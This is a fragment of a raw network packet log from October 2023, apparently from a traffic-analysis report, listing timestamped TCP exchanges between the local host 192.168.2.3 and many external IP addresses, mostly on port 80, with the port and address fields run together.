                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813368082 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813416004 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813425064 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813433886 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813460112 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813519001 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813558102 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813575983 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813615084 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813671112 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.813709974 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.882445097 CEST804989472.44.93.236192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.883562088 CEST804989472.44.93.236192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.883598089 CEST804989472.44.93.236192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.883771896 CEST4989480192.168.2.372.44.93.236
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:47.947568893 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137368917 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137392044 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137479067 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137514114 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137556076 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137614965 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137650967 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137686014 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137720108 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137940884 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137978077 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.137996912 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.138031006 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.138093948 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.138133049 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.140052080 CEST4989380192.168.2.3193.70.68.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.171310902 CEST8049895104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.171401978 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.202461958 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.219054937 CEST4989680192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.391042948 CEST8049896107.180.98.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.391403913 CEST4989680192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.391622066 CEST4989680192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.424885988 CEST8049895104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.428061008 CEST8049895104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.428354025 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.429179907 CEST8049879188.166.152.188192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.429245949 CEST4987980192.168.2.3188.166.152.188
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.448122025 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.465267897 CEST8049893193.70.68.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.563110113 CEST8049896107.180.98.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.567687035 CEST8049896107.180.98.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.567764997 CEST4989680192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.567888975 CEST4989680192.168.2.3107.180.98.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.616040945 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.673547029 CEST8049895104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.673674107 CEST4989580192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.739459038 CEST8049896107.180.98.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.747215986 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.854989052 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:48.855261087 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.062859058 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.062995911 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.063337088 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.094176054 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.094345093 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.333306074 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.378741980 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.379834890 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.380007982 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.381340981 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.418893099 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.418957949 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.418973923 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.419018030 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.419056892 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.419092894 CEST8049897104.247.81.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.419105053 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.419140100 CEST4989780192.168.2.3104.247.81.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.481152058 CEST4989180192.168.2.364.125.133.18
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.697248936 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.697345972 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.698765039 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.900691986 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.014586926 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.014719009 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.016072989 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.130330086 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.130470991 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.131666899 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.332035065 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.332170010 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.333365917 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.361321926 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362708092 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362765074 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362783909 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362855911 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362927914 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362927914 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362930059 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362946987 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362993002 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.362993002 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363027096 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363115072 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363153934 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363153934 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363183975 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363230944 CEST804989954.211.34.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363269091 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.363269091 CEST4989980192.168.2.354.211.34.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.630583048 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.649641991 CEST80498983.65.101.129192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.649733067 CEST4989880192.168.2.33.65.101.129
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.856057882 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.856376886 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.856729031 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.930530071 CEST804988666.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.930730104 CEST4988680192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.001888990 CEST8049887208.109.214.162192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.002058029 CEST4988780192.168.2.3208.109.214.162
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.081964016 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438807011 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438838005 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438854933 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438883066 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438921928 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438934088 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.438976049 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439033031 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439071894 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439107895 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439146042 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439151049 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439186096 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439251900 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439291000 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439326048 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439341068 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439361095 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.439378977 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664407015 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664437056 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664457083 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664483070 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664552927 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664613962 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664647102 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664671898 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664710999 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664731026 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664766073 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664804935 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664809942 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664853096 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664891005 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664927006 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664932013 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.664967060 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665005922 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665043116 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665046930 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665081978 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665138960 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665178061 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665288925 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665332079 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665347099 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665385962 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665438890 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665482044 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665555000 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665589094 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665594101 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665627003 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665662050 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.665697098 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.703335047 CEST8049889122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.703533888 CEST4988980192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891484022 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891536951 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891577005 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891616106 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891659975 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891719103 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891767979 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891804934 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891813993 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891851902 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891869068 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891890049 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891901970 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891947985 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.891971111 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892009020 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892024040 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892061949 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892079115 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892129898 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892148018 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892185926 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892194033 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892236948 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892254114 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892294884 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892307997 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892332077 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892345905 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892384052 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892400980 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892452002 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892561913 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892599106 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892612934 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892664909 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892699003 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892735958 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892749071 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892771959 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892808914 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892849922 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892849922 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892849922 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892875910 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892929077 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892946959 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.892997026 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893047094 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893085003 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893121958 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893160105 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893186092 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893217087 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893233061 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893290997 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893337011 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893388033 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893408060 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893459082 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893476963 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893526077 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893865108 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893903017 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.893992901 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.894005060 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.894171953 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.894295931 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.894648075 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.894773006 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.895167112 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.895205021 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.895293951 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.895306110 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.961354017 CEST8049856104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.961477041 CEST4985680192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.039997101 CEST4990380192.168.2.3103.224.212.212
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.074975967 CEST4988225192.168.2.374.125.137.27
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.117903948 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.117928982 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.117944956 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.117961884 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.117978096 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.118062973 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.118105888 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.120033979 CEST8049901104.218.10.254192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.120166063 CEST4990180192.168.2.3104.218.10.254
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.120923996 CEST8049901104.218.10.254192.168.2.3
